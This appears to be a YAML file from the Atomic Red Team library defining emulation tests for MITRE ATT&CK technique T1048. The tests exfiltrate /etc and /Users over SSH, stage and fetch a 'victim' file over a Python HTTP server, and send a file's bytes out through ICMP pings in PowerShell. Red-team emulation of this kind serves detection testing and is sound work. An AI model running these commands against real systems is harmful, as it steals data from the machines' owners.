Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
119 lines
2.8 KiB
YAML
119 lines
2.8 KiB
YAML
---
|
|
attack_technique: T1048
|
|
display_name: Exfiltration Over Alternative Protocol
|
|
|
|
atomic_tests:
|
|
- name: Exfiltration Over Alternative Protocol - SSH
|
|
description: |
|
|
Input a domain and test Exfiltration over SSH
|
|
|
|
Remote to Local
|
|
|
|
supported_platforms:
|
|
- macos
|
|
- centos
|
|
- ubuntu
|
|
- linux
|
|
|
|
input_arguments:
|
|
domain:
|
|
description: target SSH domain
|
|
type: url
|
|
default: target.example.com
|
|
user_name:
|
|
description: username for domain
|
|
type: string
|
|
default: atomic
|
|
password:
|
|
description: password for user
|
|
type: string
|
|
default: atomic
|
|
|
|
executor:
|
|
name: sh
|
|
elevation_required: false
|
|
command: |
|
|
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
|
|
|
|
- name: Exfiltration Over Alternative Protocol - SSH
|
|
description: |
|
|
Input a domain and test Exfiltration over SSH
|
|
|
|
Local to Remote
|
|
|
|
supported_platforms:
|
|
- macos
|
|
- centos
|
|
- ubuntu
|
|
- linux
|
|
|
|
input_arguments:
|
|
domain:
|
|
description: target SSH domain
|
|
type: url
|
|
default: target.example.com
|
|
user_name:
|
|
description: username for domain
|
|
type: string
|
|
default: atomic
|
|
password:
|
|
description: password for user
|
|
type: string
|
|
default: atomic
|
|
|
|
executor:
|
|
name: sh
|
|
elevation_required: false
|
|
command: |
|
|
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
|
|
|
|
- name: Exfiltration Over Alternative Protocol - HTTP
|
|
description: |
|
|
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
|
|
|
|
supported_platforms:
|
|
- macos
|
|
- centos
|
|
- ubuntu
|
|
- linux
|
|
|
|
executor:
|
|
name: manual
|
|
steps: |
|
|
1. Victim System Configuration:
|
|
|
|
mkdir /tmp/victim-staging-area
|
|
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
|
|
|
|
2. Using Python to establish a one-line HTTP server on victim system:
|
|
|
|
cd /tmp/victim-staging-area
|
|
python -m SimpleHTTPServer 1337
|
|
|
|
3. To retrieve the data from an adversary system:
|
|
|
|
wget http://VICTIM_IP:1337/victim-file.txt
|
|
|
|
- name: Exfiltration Over Alternative Protocol - ICMP
|
|
description: |
|
|
Exfiltration of specified file over ICMP protocol.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
input_file:
|
|
description: Path to file to be exfiltrated.
|
|
type: Path
|
|
default: C:\Windows\System32\notepad.exe
|
|
ip_address:
|
|
description: Destination IP address where the data should be sent.
|
|
type: String
|
|
default: 1.1.1.1
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
|